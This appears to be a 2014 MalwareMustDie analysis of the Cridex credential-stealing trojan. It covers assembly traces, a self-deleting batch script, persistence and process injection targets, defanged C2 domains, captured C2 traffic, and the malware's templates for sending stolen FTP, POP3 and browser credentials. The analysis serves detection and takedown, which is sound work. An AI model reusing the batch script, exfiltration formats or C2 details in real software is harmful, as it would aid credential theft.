- #------------------------------------------------------------------
- # MalwareMustDie | Analysis of Malware Trojan/PWS Win32/Cridex
- $ @unixfreaxjp Thursday January 16 2014 -- 02:55:48 +02:00
- # hash:
- MD5 ebb6072a86ad2496040d1bdd7d12a265
- SHA1 027d4d22faf25086040bc779360642c8faab2297
- SHA256 11643af5fef0079ce95fe2c292e1d8aecfb21dd1afc602f9ca28a8728550809b (taken from the VirusTotal URL below, which keys file reports by SHA256)
- # VT: https://www.virustotal.com/en/file/11643af5fef0079ce95fe2c292e1d8aecfb21dd1afc602f9ca28a8728550809b/analysis/
- # Network Traffic: https://www.mediafire.com/?v69oaie9edu2lo0
- # Additional- Decoded config by Mr. Kyle Yang (Fortinet) http://pastebin.com/766faxPH
- #------------------------------------------------------------------
- // Binary is packed, and the PE header checksum does not match the file ("CRC is wrong") -- unpack or dump from memory before trusting any static string or import listed below
- // Some quick reverse:
- // ASM Traces:
- // Uses Microsoft's Enhanced Cryptographic Provider (Windows CryptoAPI via ADVAPI32). The call below is CryptDecrypt(hKey=edx, hHash=0, Final=TRUE, dwFlags=0, pbData=ecx, pdwDataLen=&arg1): a single-shot, in-place decrypt of the buffer in ecx with a key handle presumably obtained earlier; the key material and algorithm are not recovered in this trace
- 00407E80 lea eax, dword ptr [esp+04h]
- 00407E84 push eax
- 00407E85 push ecx
- 00407E86 push 00000000h
- 00407E88 push 00000001h
- 00407E8A push 00000000h
- 00407E8C push edx
- 00407E8D call dword ptr [00411044h] CryptDecrypt@ADVAPI32.DLL (Import, 6 Params)
- 00407E93 ret function end
- // Anti debug / analysis evasion (suspected): LdrLoadDll is reached through a hidden, runtime-resolved import rather than the import table, and GetProcessHeap is the usual first step of a heap-flag (Flags/ForceFlags) debugger check -- neither call is conclusive on its own
- 00390426 call dword ptr [esi+08h] LdrLoadDll@NTDLL.DLL (Import, Hidden, 4 Params)
- 00404360 call dword ptr [00411138h] GetProcessHeap@KERNEL32.DLL (Import, 0 Params)
- // Simple attempt at (suspected) VM/sandbox detection: directory enumeration via PathCombineW + FindFirstFileW/FindNextFileW/FindClose, presumably looking for known guest-tool or analysis-tool files; the names being compared were not recovered
- 004050AF call dword ptr [004111DCh] PathCombineW@SHLWAPI.DLL (Import, 3 Params)
- 004050BB call dword ptr [004110D8h] FindFirstFileW@KERNEL32.DLL (Import, 2 Params)
- 00405147 call dword ptr [004111DCh] PathCombineW@SHLWAPI.DLL (Import, 3 Params)
- 00405161 call dword ptr [004111E0h] wnsprintfA@SHLWAPI.DLL (Import, Unknown Params)
- 00405196 call dword ptr [004110F0h] FindNextFileW@KERNEL32.DLL (Import, 2 Params)
- 004051A5 call dword ptr [004111C8h] FindClose@KERNEL32.DLL (Import, 1 Params)
- // Attempt to self copy: CopyFileA between two random-looking paths, followed by CreateFileA on "NUL"; the path strings below look generated per sample/run, so do not treat them as stable IOCs
- 004010C7 push 0042355Ch ASCII "C:\ghfwhe\pvLxggf\tqPUnrp\oaiQtp\MFhvyp.cia"
- 004010CC push 00423530h ASCII "C:\kblTpDb\wgiq\ckblqOQGx\piFnr\SMPgwYGn"
- 004010D1 call dword ptr [0041C02Ch] CopyFileA@KERNEL32.DLL (Import, Hidden, 3 Params)
- 004010D7 mov dword ptr [00423588h], eax
- 004010DC lea eax, dword ptr [004234D8h] UTF-16 "C:\utjDet\dvwtc\txfLv\hjuvaq" (Hidden)
- 004010E2 mov dword ptr [004235C8h], eax
- 004010E7 push dword ptr [004235C8h]
- 004010ED mov eax, dword ptr [004235A0h] 0x00000000
- 004010F2 mov dword ptr [ebp-34h], eax
- 004010F5 push dword ptr [ebp-34h]
- 004010F8 mov dword ptr [004235CCh], eax
- 004010FD push dword ptr [004235CCh]
- 00401103 push dword ptr [004235D0h]
- 00401109 mov dword ptr [ebp-38h], eax
- 0040110C push dword ptr [ebp-38h]
- 0040110F push dword ptr [004235D4h]
- 00401115 push dword ptr [004235D8h]
- 0040111B push 0042359Ch ASCII "NUL"
- 00401120 call dword ptr [0041C018h] CreateFileA@KERNEL32.DLL (Import, Hidden, 7 Params)
- // Seeking further...
- // Batch file dropped as %TEMP%\exp1.tmp.bat (exp2, exp3, ... for each spawned copy): a self-delete ("melt") routine rather than a copy -- it loops deleting the original sample until the delete succeeds, then deletes itself:
- @echo off
- :R
- del /F /Q /A "C:\%sample%.exe"
- if exist "C:\%sample%.exe" goto R
- del /F /Q /A "%TEMP%\exp1.tmp.bat"
- // Drops copies with file name format:
- KB%08d.exe (i.e. 4168e4 -> "KB00161095.exe"); matches ^KB\d{8}\.exe$ -- usable as a host IOC together with %TEMP%\exp*.tmp.bat and the cmd.exe /c launch pattern below
- // Self duplication flooded the test bed (every KB*.exe copy has the same MD5 as the sample and in turn spawns cmd.exe /c %TEMP%\expN.tmp.bat):
- sample.exe (PID: 2032 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 1400 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp1.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00161095.exe (PID: 1236 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 1268 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp2.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00082345.exe (PID: 1892 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 488 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp3.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00731095.exe (PID: 1832 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 1776 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp4.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB01378595.exe (PID: 1168 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 1528 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp5.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00942141.exe (PID: 1320 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 1772 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp6.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00003595.exe (PID: 352 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 900 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp7.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00029540.exe (PID: 2000 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 424 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp8.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00854540.exe (PID: 220 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 1060 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp9.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB01150790.exe (PID: 632 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 2024 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expA.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB01044540.exe (PID: 1584 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 2472 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expB.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB01193090.exe (PID: 2176 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 2852 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expC.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00740891.exe (PID: 3528 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 2928 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expD.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00668290.exe (PID: 2792 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 3408 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expE.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00616461.exe (PID: 868 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 3340 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expF.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB01448595.exe (PID: 3220 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 3984 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp10.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00933391.exe (PID: 3860 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 596 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp11.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00234437.exe (PID: 896 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 2484 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp12.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00688187.exe (PID: 2404 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- cmd.exe (PID: 3172 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp13.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
- KB00677040.exe (PID: 3180 MD5: EBB6072A86AD2496040D1BDD7D12A265)
- // Autostart (persistence via the Run key; the hive is not recorded in this trace -- check both HKCU and HKLM):
- Software\Microsoft\Windows\CurrentVersion\Run
- // Target process names (firefox.exe and chrome.exe for browser hooking; explorer.exe is the shell, not a browser -- presumably the host process for the injected code):
- 4112d8 -> firefox.exe
- 4112f0 -> explorer.exe
- 4112c0 -> chrome.exe
- // This is the cyber crime evidence part....
- // CNC LIST (h00p:// is a defanged http://):
- h00p://portasible.ru
- h00p://ssshsecur.ru
- h00p://glebstark.ru
- h00p://kuchereneltd.ru
- // CNC Request:
- POST /PHVxGBAAAAA/yir2HD/99ocWCAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: kuchereneltd.ru
- Content-Length: 338
- Connection: Keep-Alive
- Cache-Control: no-cache
- 000000E0 0a .
- 000000E1 8d 6c 6d d8 7b 67 37 69 bd 95 d2 34 30 ca 6b 51 .lm.{g7i ...40.kQ
- 000000F1 9e a4 d2 11 b3 27 27 36 bb 12 c2 b8 82 29 35 f4 .....''6 .....)5.
- 00000101 c4 4e 50 5b 54 cb 89 7d b0 97 63 43 cc 00 81 8b .NP[T..} ..cC....
- 00000111 fa 46 0b 3b e7 29 0d ac 9e 75 12 f1 95 a6 70 dd .F.;.).. .u....p.
- 00000121 af a8 9d 09 7e fd 3a a6 92 c9 b7 96 78 d7 79 bf ....~.:. ....x.y.
- 00000131 25 90 51 dd 1b 30 41 df a2 53 83 56 f5 bd bf ea %.Q..0A. .S.V....
- 00000141 69 aa ef fa db d1 05 c9 ca f5 44 ae e2 df 58 d5 i....... ..D...X.
- 00000151 28 36 31 a4 57 f4 b0 a6 79 c8 f9 d9 42 18 ae 96 (61.W... y...B...
- 00000161 e9 e2 cf f7 c9 9f 50 f9 67 48 e7 49 8b 4b 90 5f ......P. gH.I.K._
- 00000171 fc eb 77 82 89 df 13 7a 09 f3 b1 96 69 26 cd ad ..w....z ....i&..
- 00000181 9b 64 b8 49 eb 3f 35 d7 a5 50 b9 e2 f0 c4 49 6c .d.I.?5. .P....Il
- 00000191 d3 97 85 76 76 88 2d 61 2d 2f e5 8d 5a 7a 4c 59 ...vv.-a -/..ZzLY
- 000001A1 90 68 5a ab 96 db 9c b3 41 51 ed f0 94 2b f8 8a .hZ..... AQ...+..
- 000001B1 8c c8 a0 b4 79 4c bc 5a 93 ee 5f 4f 1e 2f 5e aa ....yL.Z .._O./^.
- 000001C1 20 9b 8c 5c d4 f1 bb f0 b0 b1 d4 e6 6d 67 35 6f ..\.... ....mg5o
- 000001D1 3c 94 1c 6a 5e 1d fb ce 49 80 81 3a 77 4d 72 94 <..j^... I..:wMr.
- 000001E1 c6 15 6d 00 9d d9 fe 98 af 80 19 6d 1f c6 c6 0e ..m..... ...m....
- 000001F1 fe 5a 61 16 dc 1f ca b1 77 c3 2e 95 97 8e 3d f2 .Za..... w.....=.
- 00000201 91 24 df 99 e4 cb 13 35 76 20 4d cd 21 91 13 42 .$.....5 v M.!..B
- 00000211 67 ac 49 85 cb 5e 3e b1 8d c0 e4 13 6a dc ad 61 g.I..^>. ....j..a
- 00000221 7f 68 0d c4 e4 27 85 00 89 58 dc 57 b9 6d 4c 98 .h...'.. .X.W.mL.
- 00000231 4d 93 M.
- // HTTP POST SENT FORMAT:
- // strings hard-coded in the binary (usable for IOC/YARA); note the fake User-Agent -- "Mozilla/5.0" combined with "MSIE 7.0" on "Windows NT 6.0" does not match the format a genuine IE 7 sends, which makes it a good network signature
- Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- HTTP/1.1 200 OK Connection: close
- application/x-www-form-urlencoded
- multipart/form-data
- Content-Disposition: attachment; filename=%S
- // CNC/Botnet Related commands:
- formgrabber
- commands
- allow
- deny
- redirect
- https
- bconnect
- type
- settings
- actions
- httpinjects
- pattern
- process
- send
- exec
- socket
- select
- httpshots
- closesocket
- // Two HTTP version strings present (versions, not methods) -- requests may be built as either:
- HTTP/1.1
- HTTP/1.0
- // CREDENTIAL STEALER TEMPLATE
- // template used to send stolen credentials, shown here with its format placeholders (i.e. before the data is filled in and encrypted):
- 4118b0 -> <message set_hash="%%.%us" req_set="%%%%u" req_upd="%%%%u"> // Operating system
- <header>
- <unique>%%.%us</unique>
- <version>%%u</version>
- <system>%%u</system>
- <network>%%u</network>
- </header><data>
- 411a3c -> </data></message>
- 411730: <pop3 time="%%%uu"><server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server> //pop3 mail
- <user><![CDATA[%%.%us]]></user><pass><![CDATA[
- 4117a4 -> ]]></pass></pop3>
- 411850: <ff time="%u"><data><![CDATA[ // firefox
- 411870: ]]></data></ff>
- 411880: <mm time="%u"><data><![CDATA[ // mm? macromedia?
- 4118a0 -> ]]></data></mm>
- 4117d0: <cert time="%u"><pass><![CDATA[ // certification/pwd
- 4117f0: ]]></pass><data><![CDATA[
- 41180c -> ]]></data></cert>
- 411648: <httpshot time="%%%uu"><url><![CDATA[%%.%us]]></url><data><![CDATA[ //links
- 41168c -> ]]></data></httpshot>
- 4116a8: <ftp time="%%%uu"><server> // FTP credential sender format:
- <![CDATA[%%u.%%u.%%u.%%u:%%u]]></server>
- <user><![CDATA[%%.%us]]></user><pass><![CDATA[
- 41171c: ]]></pass></ftp>
- 4115c8: <http time="%%%uu"> // links
- <url><![CDATA[%%.%us]]></url>
- <useragent><![CDATA[%%.%us]]></useragent><data><![CDATA[
- 411634 -> ]]></data></http>
- 411820: <ie time="%u"><data><![CDATA[
- 411840 -> ]]></data></ie>
- // CNC Response (chunked; the first chunk size "b687" = 0xB687 = 46727 bytes of encrypted data, terminated by the "0\r\n\r\n" at the end of the dump). The Server and X-Powered-By headers (nginx/1.2.1, PHP/5.4.4-14+deb7u7 -- a Debian 7 package version string) are useful for fingerprinting the C2 host:
- HTTP/1.1 200 OK
- Server: nginx/1.2.1
- Date: Wed, 15 Jan 2014 23:09:22 GMT
- Content-Type: text/html
- Transfer-Encoding: chunked
- Connection: keep-alive
- X-Powered-By: PHP/5.4.4-14+deb7u7
- Vary: Accept-Encoding
- 000000D0 0d 0a 0d 0a 62 36 38 37 0d 0a 1e 06 31 bd 7f b1 ....b687 ....1...
- 000000E0 66 f9 5e c2 33 44 02 05 c3 71 7c 6e ff 4d 12 93 f.^.3D.. .q|n.M..
- 000000F0 a7 a6 28 ae 99 db dc d0 77 fc e6 66 c2 f0 15 5d ..(..... w..f...]
- 00000100 d9 e2 5f ab 92 11 2a 51 4d ca f4 17 e8 b9 a2 96 .._...*Q M.......
- 00000110 d9 1e 40 1f 87 00 76 f2 d8 e9 14 4c 1f 1f 30 97 ..@...v. ...L..0.
- 00000120 68 52 14 af 87 63 19 80 06 8e 04 77 6e 48 c9 ca hR...c.. ...wnH..
- 00000130 5f b9 db 8a 40 b7 74 e0 93 4a 0a 9e 55 b8 14 b8 _...@.t. .J..U...
- 00000140 5c ba ce c8 80 6b fb d3 c2 66 72 ec 65 aa bf f6 \....k.. .fr.e...
- 00000150 fe 3c 42 74 8c e7 27 b1 39 a9 da 39 a3 ee 5e 6b .<Bt..'. 9..9..^k
- 00000160 4b 0d 32 55 bf ef 95 60 18 90 af d8 07 09 89 c2 K.2U...` ........
- 00000170 17 6a 11 f7 a2 cd 75 26 cd ad b0 65 b7 5d f0 22 .j....u& ...e.]."
- 00000180 7f 94 f6 4a e1 b1 97 d1 1d 28 da d0 80 64 66 9e ...J.... .(...df.
- [...]
- 0000B6B8 6d 13 6c 3f f1 15 1c f5 d2 75 f7 3c ca 66 f9 18 m.l?.... .u.<.f..
- 0000B6C8 c9 80 a0 7f 4b 07 01 e7 3b b7 d8 0f a0 ce 3a 1e ....K... ;.....:.
- 0000B6D8 5c 58 9f 2d e8 98 fe 23 b1 06 ab 96 94 9c 84 1e \X.-...# ........
- 0000B6E8 09 e5 10 11 28 05 61 c8 a4 96 22 b8 4f 10 5a 57 ....(.a. ..".O.ZW
- 0000B6F8 c8 2e 23 2b 91 ad 16 fe 92 9c 5d e4 57 0c b6 bb ..#+.... ..].W...
- 0000B708 0a 47 bf 77 30 c2 01 e7 c4 7f b1 a0 5c 8c 70 4b .G.w0... ....\.pK
- 0000B718 6f e0 72 8e 2a 40 8a 10 c9 f0 f0 78 cf 09 c3 8b o.r.*@.. ...x....
- 0000B728 d2 a0 20 78 18 92 46 67 eb 86 d8 03 9c 30 96 da .. x..Fg .....0..
- 0000B738 46 05 ad 52 65 b6 d8 41 d3 52 5a d5 21 f9 64 54 F..Re..A .RZ.!.dT
- 0000B748 08 7d b1 83 73 8a ee a1 77 f8 fb f0 2a 82 cf 94 .}..s... w...*...
- 0000B758 df c2 94 7c 87 d6 6e 18 a4 0d 0a 30 0d 0a 0d 0a ...|..n. ...0....
- // One Domain used as CNC is CURRENTLY ALIVE!! (registered 2014.01.06 per the whois below, ten days before this analysis)
- FYI, one of the domains was still active at the time of this note -- resolving, answering HTTP and, per the analyst, serving malware (dig, whois and a GET follow):
- $ date
- Thu Jan 16 11:09:48 JST 2014
- $ dig kuchereneltd.ru
- ; <<>> DiG 9.2.5 <<>> kuchereneltd.ru
- ;; global options: printcmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 17040
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 10
- ;; QUESTION SECTION:
- ;kuchereneltd.ru. IN A
- ;; ANSWER SECTION:
- kuchereneltd.ru. 3600 IN A 94.76.240.56
- ;; AUTHORITY SECTION:
- kuchereneltd.ru. 3600 IN NS ns2.reg.ru.
- kuchereneltd.ru. 3600 IN NS ns1.reg.ru.
- ;; ADDITIONAL SECTION:
- ns2.reg.ru. 2518 IN A 31.31.205.74
- ns2.reg.ru. 2518 IN A 88.212.207.122
- ns2.reg.ru. 2518 IN A 198.100.149.22
- ns2.reg.ru. 2518 IN A 31.31.205.56
- ns1.reg.ru. 3046 IN A 31.31.205.73
- ns1.reg.ru. 3046 IN A 31.31.204.25
- ns1.reg.ru. 3046 IN A 31.31.204.37
- ns1.reg.ru. 3046 IN A 31.31.204.52
- ns1.reg.ru. 3046 IN A 31.31.205.39
- ns1.reg.ru. 3046 IN A 31.31.205.55
- ;; Query time: 275 msec
- ;; SERVER: 202.238.95.24#53(202.238.95.24)
- ;; WHEN: Thu Jan 16 11:09:13 2014
- ;; MSG SIZE rcvd: 249
- domain: KUCHERENELTD.RU
- nserver: ns1.reg.ru.
- nserver: ns2.reg.ru.
- state: REGISTERED, DELEGATED, UNVERIFIED
- person: Private Person
- registrar: REGRU-REG-RIPN
- admin-contact: http://www.reg.ru/whois/admin_contact
- created: 2014.01.06
- paid-till: 2015.01.06
- free-date: 2015.02.06
- source: TCI
- Last updated on 2014.01.16 06:06:36 MSK
- $ myget -d kuchereneltd.ru
- GET / HTTP/1.1
- Accept: */*
- Host: kuchereneltd.ru
- Server: nginx/1.2.1
- Date: Thu, 16 Jan 2014 02:26:47 GMT
- Content-Type: text/html
- Transfer-Encoding: chunked
- Connection: keep-alive
- ---
- #MalwareMustDie!
- " Thou shalt not steal.."